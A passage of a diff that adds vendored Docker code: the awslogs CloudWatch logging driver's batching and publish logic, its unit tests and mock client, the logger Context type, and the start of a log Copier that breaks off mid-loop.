+func (l *logStream) collectBatch() { + timer := newTicker(batchPublishFrequency) + var events []wrappedEvent + bytes := 0 + for { + select { + case <-timer.C: + l.publishBatch(events) + events = events[:0] + bytes = 0 + case msg, more := <-l.messages: + if !more { + l.publishBatch(events) + return + } + unprocessedLine := msg.Line + for len(unprocessedLine) > 0 { + // Split line length so it does not exceed the maximum + lineBytes := len(unprocessedLine) + if lineBytes > maximumBytesPerEvent { + lineBytes = maximumBytesPerEvent + } + line := unprocessedLine[:lineBytes] + unprocessedLine = unprocessedLine[lineBytes:] + if (len(events) >= maximumLogEventsPerPut) || (bytes+lineBytes+perEventBytes > maximumBytesPerPut) { + // Publish an existing batch if it's already over the maximum number of events or if adding this + // event would push it over the maximum number of total bytes. + l.publishBatch(events) + events = events[:0] + bytes = 0 + } + events = append(events, wrappedEvent{ + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(string(line)), + Timestamp: aws.Int64(msg.Timestamp.UnixNano() / int64(time.Millisecond)), + }, + insertOrder: len(events), + }) + bytes += (lineBytes + perEventBytes) + } + } + } +} + +// publishBatch calls PutLogEvents for a given set of InputLogEvents, +// accounting for sequencing requirements (each request must reference the +// sequence token returned by the previous request). 
+func (l *logStream) publishBatch(events []wrappedEvent) { + if len(events) == 0 { + return + } + + // events in a batch must be sorted by timestamp + // see http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html + sort.Sort(byTimestamp(events)) + cwEvents := unwrapEvents(events) + + nextSequenceToken, err := l.putLogEvents(cwEvents, l.sequenceToken) + + if err != nil { + if awsErr, ok := err.(awserr.Error); ok { + if awsErr.Code() == dataAlreadyAcceptedCode { + // already submitted, just grab the correct sequence token + parts := strings.Split(awsErr.Message(), " ") + nextSequenceToken = &parts[len(parts)-1] + logrus.WithFields(logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "logGroupName": l.logGroupName, + "logStreamName": l.logStreamName, + }).Info("Data already accepted, ignoring error") + err = nil + } else if awsErr.Code() == invalidSequenceTokenCode { + // sequence code is bad, grab the correct one and retry + parts := strings.Split(awsErr.Message(), " ") + token := parts[len(parts)-1] + nextSequenceToken, err = l.putLogEvents(cwEvents, &token) + } + } + } + if err != nil { + logrus.Error(err) + } else { + l.sequenceToken = nextSequenceToken + } +} + +// putLogEvents wraps the PutLogEvents API +func (l *logStream) putLogEvents(events []*cloudwatchlogs.InputLogEvent, sequenceToken *string) (*string, error) { + input := &cloudwatchlogs.PutLogEventsInput{ + LogEvents: events, + SequenceToken: sequenceToken, + LogGroupName: aws.String(l.logGroupName), + LogStreamName: aws.String(l.logStreamName), + } + resp, err := l.client.PutLogEvents(input) + if err != nil { + if awsErr, ok := err.(awserr.Error); ok { + logrus.WithFields(logrus.Fields{ + "errorCode": awsErr.Code(), + "message": awsErr.Message(), + "origError": awsErr.OrigErr(), + "logGroupName": l.logGroupName, + "logStreamName": l.logStreamName, + }).Error("Failed to put log events") + } + return nil, err + } + return resp.NextSequenceToken, 
nil +} + +// ValidateLogOpt looks for awslogs-specific log options awslogs-region, +// awslogs-group, and awslogs-stream +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case logGroupKey: + case logStreamKey: + case regionKey: + case tagKey: + default: + return fmt.Errorf("unknown log opt '%s' for %s log driver", key, name) + } + } + if cfg[logGroupKey] == "" { + return fmt.Errorf("must specify a value for log opt '%s'", logGroupKey) + } + return nil +} + +// Len returns the length of a byTimestamp slice. Len is required by the +// sort.Interface interface. +func (slice byTimestamp) Len() int { + return len(slice) +} + +// Less compares two values in a byTimestamp slice by Timestamp. Less is +// required by the sort.Interface interface. +func (slice byTimestamp) Less(i, j int) bool { + iTimestamp, jTimestamp := int64(0), int64(0) + if slice != nil && slice[i].inputLogEvent.Timestamp != nil { + iTimestamp = *slice[i].inputLogEvent.Timestamp + } + if slice != nil && slice[j].inputLogEvent.Timestamp != nil { + jTimestamp = *slice[j].inputLogEvent.Timestamp + } + if iTimestamp == jTimestamp { + return slice[i].insertOrder < slice[j].insertOrder + } + return iTimestamp < jTimestamp +} + +// Swap swaps two values in a byTimestamp slice with each other. Swap is +// required by the sort.Interface interface. 
+func (slice byTimestamp) Swap(i, j int) { + slice[i], slice[j] = slice[j], slice[i] +} + +func unwrapEvents(events []wrappedEvent) []*cloudwatchlogs.InputLogEvent { + cwEvents := []*cloudwatchlogs.InputLogEvent{} + for _, input := range events { + cwEvents = append(cwEvents, input.inputLogEvent) + } + return cwEvents +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go new file mode 100644 index 0000000000..d5b1aaef52 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go @@ -0,0 +1,724 @@ +package awslogs + +import ( + "errors" + "fmt" + "net/http" + "reflect" + "runtime" + "strings" + "testing" + "time" + + "github.com/aws/aws-sdk-go/aws" + "github.com/aws/aws-sdk-go/aws/awserr" + "github.com/aws/aws-sdk-go/aws/request" + "github.com/aws/aws-sdk-go/service/cloudwatchlogs" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/dockerversion" +) + +const ( + groupName = "groupName" + streamName = "streamName" + sequenceToken = "sequenceToken" + nextSequenceToken = "nextSequenceToken" + logline = "this is a log line" +) + +func TestNewAWSLogsClientUserAgentHandler(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{ + regionKey: "us-east-1", + }, + } + + client, err := newAWSLogsClient(ctx) + if err != nil { + t.Fatal(err) + } + realClient, ok := client.(*cloudwatchlogs.CloudWatchLogs) + if !ok { + t.Fatal("Could not cast client to cloudwatchlogs.CloudWatchLogs") + } + buildHandlerList := realClient.Handlers.Build + request := &request.Request{ + HTTPRequest: &http.Request{ + Header: http.Header{}, + }, + } + buildHandlerList.Run(request) + expectedUserAgentString := fmt.Sprintf("Docker %s (%s) %s/%s (%s; %s; %s)", + dockerversion.Version, runtime.GOOS, aws.SDKName, aws.SDKVersion, runtime.Version(), runtime.GOOS, 
runtime.GOARCH) + userAgent := request.HTTPRequest.Header.Get("User-Agent") + if userAgent != expectedUserAgentString { + t.Errorf("Wrong User-Agent string, expected \"%s\" but was \"%s\"", + expectedUserAgentString, userAgent) + } +} + +func TestNewAWSLogsClientRegionDetect(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{}, + } + + mockMetadata := newMockMetadataClient() + newRegionFinder = func() regionFinder { + return mockMetadata + } + mockMetadata.regionResult <- ®ionResult{ + successResult: "us-east-1", + } + + _, err := newAWSLogsClient(ctx) + if err != nil { + t.Fatal(err) + } +} + +func TestCreateSuccess(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + } + mockClient.createLogStreamResult <- &createLogStreamResult{} + + err := stream.create() + + if err != nil { + t.Errorf("Received unexpected err: %v\n", err) + } + argument := <-mockClient.createLogStreamArgument + if argument.LogGroupName == nil { + t.Fatal("Expected non-nil LogGroupName") + } + if *argument.LogGroupName != groupName { + t.Errorf("Expected LogGroupName to be %s", groupName) + } + if argument.LogStreamName == nil { + t.Fatal("Expected non-nil LogGroupName") + } + if *argument.LogStreamName != streamName { + t.Errorf("Expected LogStreamName to be %s", streamName) + } +} + +func TestCreateError(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + } + mockClient.createLogStreamResult <- &createLogStreamResult{ + errorResult: errors.New("Error!"), + } + + err := stream.create() + + if err == nil { + t.Fatal("Expected non-nil err") + } +} + +func TestCreateAlreadyExists(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + } + mockClient.createLogStreamResult <- &createLogStreamResult{ + errorResult: awserr.New(resourceAlreadyExistsCode, "", nil), + } + + err := stream.create() + + if 
err != nil { + t.Fatal("Expected nil err") + } +} + +func TestPublishBatchSuccess(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != nextSequenceToken { + t.Errorf("Expected sequenceToken to be %s, but was %s", nextSequenceToken, *stream.sequenceToken) + } + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != sequenceToken { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } +} + +func TestPublishBatchError(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + errorResult: errors.New("Error!"), + } + + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil 
{ + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != sequenceToken { + t.Errorf("Expected sequenceToken to be %s, but was %s", sequenceToken, *stream.sequenceToken) + } +} + +func TestPublishBatchInvalidSeqSuccess(t *testing.T) { + mockClient := newMockClientBuffered(2) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + errorResult: awserr.New(invalidSequenceTokenCode, "use token token", nil), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != nextSequenceToken { + t.Errorf("Expected sequenceToken to be %s, but was %s", nextSequenceToken, *stream.sequenceToken) + } + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != sequenceToken { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } + + argument = <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil 
PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != "token" { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", "token", *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } +} + +func TestPublishBatchAlreadyAccepted(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + errorResult: awserr.New(dataAlreadyAcceptedCode, "use token token", nil), + } + + events := []wrappedEvent{ + { + inputLogEvent: &cloudwatchlogs.InputLogEvent{ + Message: aws.String(logline), + }, + }, + } + + stream.publishBatch(events) + if stream.sequenceToken == nil { + t.Fatal("Expected non-nil sequenceToken") + } + if *stream.sequenceToken != "token" { + t.Errorf("Expected sequenceToken to be %s, but was %s", "token", *stream.sequenceToken) + } + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if argument.SequenceToken == nil { + t.Fatal("Expected non-nil PutLogEventsInput.SequenceToken") + } + if *argument.SequenceToken != sequenceToken { + t.Errorf("Expected PutLogEventsInput.SequenceToken to be %s, but was %s", sequenceToken, *argument.SequenceToken) + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if argument.LogEvents[0] != events[0].inputLogEvent { + t.Error("Expected event to equal input") + } +} + +func TestCollectBatchSimple(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: 
streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Time{}, + }) + + ticks <- time.Time{} + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline { + t.Errorf("Expected message to be %s but was %s", logline, *argument.LogEvents[0].Message) + } +} + +func TestCollectBatchTicker(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + stream.Log(&logger.Message{ + Line: []byte(logline + " 1"), + Timestamp: time.Time{}, + }) + stream.Log(&logger.Message{ + Line: []byte(logline + " 2"), + Timestamp: time.Time{}, + }) + + ticks <- time.Time{} + + // Verify first batch + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 2 { + t.Errorf("Expected LogEvents to contain 2 
elements, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline+" 1" { + t.Errorf("Expected message to be %s but was %s", logline+" 1", *argument.LogEvents[0].Message) + } + if *argument.LogEvents[1].Message != logline+" 2" { + t.Errorf("Expected message to be %s but was %s", logline+" 2", *argument.LogEvents[0].Message) + } + + stream.Log(&logger.Message{ + Line: []byte(logline + " 3"), + Timestamp: time.Time{}, + }) + + ticks <- time.Time{} + argument = <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 elements, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline+" 3" { + t.Errorf("Expected message to be %s but was %s", logline+" 3", *argument.LogEvents[0].Message) + } + + stream.Close() + +} + +func TestCollectBatchClose(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + stream.Log(&logger.Message{ + Line: []byte(logline), + Timestamp: time.Time{}, + }) + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain 1 element, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != logline { + t.Errorf("Expected message to be %s but was 
%s", logline, *argument.LogEvents[0].Message) + } +} + +func TestCollectBatchLineSplit(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + longline := strings.Repeat("A", maximumBytesPerEvent) + stream.Log(&logger.Message{ + Line: []byte(longline + "B"), + Timestamp: time.Time{}, + }) + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 2 { + t.Errorf("Expected LogEvents to contain 2 elements, but contains %d", len(argument.LogEvents)) + } + if *argument.LogEvents[0].Message != longline { + t.Errorf("Expected message to be %s but was %s", longline, *argument.LogEvents[0].Message) + } + if *argument.LogEvents[1].Message != "B" { + t.Errorf("Expected message to be %s but was %s", "B", *argument.LogEvents[1].Message) + } +} + +func TestCollectBatchMaxEvents(t *testing.T) { + mockClient := newMockClientBuffered(1) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + 
line := "A" + for i := 0; i <= maximumLogEventsPerPut; i++ { + stream.Log(&logger.Message{ + Line: []byte(line), + Timestamp: time.Time{}, + }) + } + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != maximumLogEventsPerPut { + t.Errorf("Expected LogEvents to contain %d elements, but contains %d", maximumLogEventsPerPut, len(argument.LogEvents)) + } + + argument = <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to contain %d elements, but contains %d", 1, len(argument.LogEvents)) + } +} + +func TestCollectBatchMaxTotalBytes(t *testing.T) { + mockClient := newMockClientBuffered(1) + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + var ticks = make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + longline := strings.Repeat("A", maximumBytesPerPut) + stream.Log(&logger.Message{ + Line: []byte(longline + "B"), + Timestamp: time.Time{}, + }) + + // no ticks + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + bytes := 0 + for _, event := range argument.LogEvents { + bytes += len(*event.Message) + } + if bytes > maximumBytesPerPut { + t.Errorf("Expected <= %d bytes but was %d", maximumBytesPerPut, bytes) + } + + argument = <-mockClient.putLogEventsArgument + if len(argument.LogEvents) != 1 { + t.Errorf("Expected LogEvents to 
contain 1 elements, but contains %d", len(argument.LogEvents)) + } + message := *argument.LogEvents[0].Message + if message[len(message)-1:] != "B" { + t.Errorf("Expected message to be %s but was %s", "B", message[len(message)-1:]) + } +} + +func TestCollectBatchWithDuplicateTimestamps(t *testing.T) { + mockClient := newMockClient() + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: streamName, + sequenceToken: aws.String(sequenceToken), + messages: make(chan *logger.Message), + } + mockClient.putLogEventsResult <- &putLogEventsResult{ + successResult: &cloudwatchlogs.PutLogEventsOutput{ + NextSequenceToken: aws.String(nextSequenceToken), + }, + } + ticks := make(chan time.Time) + newTicker = func(_ time.Duration) *time.Ticker { + return &time.Ticker{ + C: ticks, + } + } + + go stream.collectBatch() + + times := maximumLogEventsPerPut + expectedEvents := []*cloudwatchlogs.InputLogEvent{} + timestamp := time.Now() + for i := 0; i < times; i++ { + line := fmt.Sprintf("%d", i) + if i%2 == 0 { + timestamp.Add(1 * time.Nanosecond) + } + stream.Log(&logger.Message{ + Line: []byte(line), + Timestamp: timestamp, + }) + expectedEvents = append(expectedEvents, &cloudwatchlogs.InputLogEvent{ + Message: aws.String(line), + Timestamp: aws.Int64(timestamp.UnixNano() / int64(time.Millisecond)), + }) + } + + ticks <- time.Time{} + stream.Close() + + argument := <-mockClient.putLogEventsArgument + if argument == nil { + t.Fatal("Expected non-nil PutLogEventsInput") + } + if len(argument.LogEvents) != times { + t.Errorf("Expected LogEvents to contain %d elements, but contains %d", times, len(argument.LogEvents)) + } + for i := 0; i < times; i++ { + if !reflect.DeepEqual(*argument.LogEvents[i], *expectedEvents[i]) { + t.Errorf("Expected event to be %v but was %v", *expectedEvents[i], *argument.LogEvents[i]) + } + } +} + +func TestCreateTagSuccess(t *testing.T) { + mockClient := newMockClient() + ctx := logger.Context{ + ContainerName: 
"/test-container", + ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", + Config: map[string]string{"tag": "{{.Name}}/{{.FullID}}"}, + } + logStreamName, e := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if e != nil { + t.Errorf("Error generating tag: %q", e) + } + stream := &logStream{ + client: mockClient, + logGroupName: groupName, + logStreamName: logStreamName, + } + mockClient.createLogStreamResult <- &createLogStreamResult{} + + err := stream.create() + + if err != nil { + t.Errorf("Received unexpected err: %v\n", err) + } + argument := <-mockClient.createLogStreamArgument + + if *argument.LogStreamName != "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890" { + t.Errorf("Expected LogStreamName to be %s", "test-container/container-abcdefghijklmnopqrstuvwxyz01234567890") + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go new file mode 100644 index 0000000000..b768a3d7ec --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go @@ -0,0 +1,77 @@ +package awslogs + +import "github.com/aws/aws-sdk-go/service/cloudwatchlogs" + +type mockcwlogsclient struct { + createLogStreamArgument chan *cloudwatchlogs.CreateLogStreamInput + createLogStreamResult chan *createLogStreamResult + putLogEventsArgument chan *cloudwatchlogs.PutLogEventsInput + putLogEventsResult chan *putLogEventsResult +} + +type createLogStreamResult struct { + successResult *cloudwatchlogs.CreateLogStreamOutput + errorResult error +} + +type putLogEventsResult struct { + successResult *cloudwatchlogs.PutLogEventsOutput + errorResult error +} + +func newMockClient() *mockcwlogsclient { + return &mockcwlogsclient{ + createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, 1), + createLogStreamResult: make(chan *createLogStreamResult, 1), + putLogEventsArgument: make(chan 
*cloudwatchlogs.PutLogEventsInput, 1), + putLogEventsResult: make(chan *putLogEventsResult, 1), + } +} + +func newMockClientBuffered(buflen int) *mockcwlogsclient { + return &mockcwlogsclient{ + createLogStreamArgument: make(chan *cloudwatchlogs.CreateLogStreamInput, buflen), + createLogStreamResult: make(chan *createLogStreamResult, buflen), + putLogEventsArgument: make(chan *cloudwatchlogs.PutLogEventsInput, buflen), + putLogEventsResult: make(chan *putLogEventsResult, buflen), + } +} + +func (m *mockcwlogsclient) CreateLogStream(input *cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error) { + m.createLogStreamArgument <- input + output := <-m.createLogStreamResult + return output.successResult, output.errorResult +} + +func (m *mockcwlogsclient) PutLogEvents(input *cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error) { + events := make([]*cloudwatchlogs.InputLogEvent, len(input.LogEvents)) + copy(events, input.LogEvents) + m.putLogEventsArgument <- &cloudwatchlogs.PutLogEventsInput{ + LogEvents: events, + SequenceToken: input.SequenceToken, + LogGroupName: input.LogGroupName, + LogStreamName: input.LogStreamName, + } + output := <-m.putLogEventsResult + return output.successResult, output.errorResult +} + +type mockmetadataclient struct { + regionResult chan *regionResult +} + +type regionResult struct { + successResult string + errorResult error +} + +func newMockMetadataClient() *mockmetadataclient { + return &mockmetadataclient{ + regionResult: make(chan *regionResult, 1), + } +} + +func (m *mockmetadataclient) Region() (string, error) { + output := <-m.regionResult + return output.successResult, output.errorResult +} diff --git a/vendor/github.com/docker/docker/daemon/logger/context.go b/vendor/github.com/docker/docker/daemon/logger/context.go new file mode 100644 index 0000000000..085ab01a18 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/context.go @@ -0,0 +1,111 @@ +package logger + 
// Context provides enough information for a logging driver to do its function.
type Context struct {
	Config              map[string]string
	ContainerID         string
	ContainerName       string
	ContainerEntrypoint string
	ContainerArgs       []string
	ContainerImageID    string
	ContainerImageName  string
	ContainerCreated    time.Time
	ContainerEnv        []string
	ContainerLabels     map[string]string
	LogPath             string
	DaemonName          string
}

// ExtraAttributes returns the user-defined extra attributes (labels,
// environment variables) in key-value format. This can be used by log drivers
// that support metadata to add more context to a log. The optional keyMod is
// applied to each key before it is stored.
func (ctx *Context) ExtraAttributes(keyMod func(string) string) map[string]string {
	extra := make(map[string]string)
	add := func(key, val string) {
		if keyMod != nil {
			key = keyMod(key)
		}
		extra[key] = val
	}

	// Config["labels"] selects which container labels to surface.
	if labels := ctx.Config["labels"]; len(labels) > 0 {
		for _, key := range strings.Split(labels, ",") {
			if v, ok := ctx.ContainerLabels[key]; ok {
				add(key, v)
			}
		}
	}

	// Config["env"] selects which environment variables to surface.
	if env := ctx.Config["env"]; len(env) > 0 {
		envMapping := make(map[string]string)
		for _, pair := range ctx.ContainerEnv {
			if kv := strings.SplitN(pair, "=", 2); len(kv) == 2 {
				envMapping[kv[0]] = kv[1]
			}
		}
		for _, key := range strings.Split(env, ",") {
			if v, ok := envMapping[key]; ok {
				add(key, v)
			}
		}
	}

	return extra
}

// Hostname returns the hostname from the underlying OS.
func (ctx *Context) Hostname() (string, error) {
	hostname, err := os.Hostname()
	if err != nil {
		return "", fmt.Errorf("logger: can not resolve hostname: %v", err)
	}
	return hostname, nil
}

// Command returns the command that the container being logged was
// started with. The Entrypoint is prepended to the container
// arguments.
func (ctx *Context) Command() string {
	return strings.Join(append([]string{ctx.ContainerEntrypoint}, ctx.ContainerArgs...), " ")
}

// ID Returns the Container ID shortened to 12 characters.
func (ctx *Context) ID() string {
	return ctx.ContainerID[:12]
}

// FullID is an alias of ContainerID.
func (ctx *Context) FullID() string {
	return ctx.ContainerID
}

// Name returns the ContainerName without a preceding '/'.
func (ctx *Context) Name() string {
	return ctx.ContainerName[1:]
}

// ImageID returns the ContainerImageID shortened to 12 characters.
func (ctx *Context) ImageID() string {
	return ctx.ContainerImageID[:12]
}

// ImageFullID is an alias of ContainerImageID.
func (ctx *Context) ImageFullID() string {
	return ctx.ContainerImageID
}

// ImageName is an alias of ContainerImageName
func (ctx *Context) ImageName() string {
	return ctx.ContainerImageName
}
+type Copier struct { + // srcs is map of name -> reader pairs, for example "stdout", "stderr" + srcs map[string]io.Reader + dst Logger + copyJobs sync.WaitGroup + closeOnce sync.Once + closed chan struct{} +} + +// NewCopier creates a new Copier +func NewCopier(srcs map[string]io.Reader, dst Logger) *Copier { + return &Copier{ + srcs: srcs, + dst: dst, + closed: make(chan struct{}), + } +} + +// Run starts logs copying +func (c *Copier) Run() { + for src, w := range c.srcs { + c.copyJobs.Add(1) + go c.copySrc(src, w) + } +} + +func (c *Copier) copySrc(name string, src io.Reader) { + defer c.copyJobs.Done() + buf := make([]byte, bufSize) + n := 0 + eof := false + msg := &Message{Source: name} + + for { + select { + case <-c.closed: + return + default: + // Work out how much more data we are okay with reading this time. + upto := n + readSize + if upto > cap(buf) { + upto = cap(buf) + } + // Try to read that data. + if upto > n { + read, err := src.Read(buf[n:upto]) + if err != nil { + if err != io.EOF { + logrus.Errorf("Error scanning log stream: %s", err) + return + } + eof = true + } + n += read + } + // If we have no data to log, and there's no more coming, we're done. + if n == 0 && eof { + return + } + // Break up the data that we've buffered up into lines, and log each in turn. + p := 0 + for q := bytes.Index(buf[p:n], []byte{'\n'}); q >= 0; q = bytes.Index(buf[p:n], []byte{'\n'}) 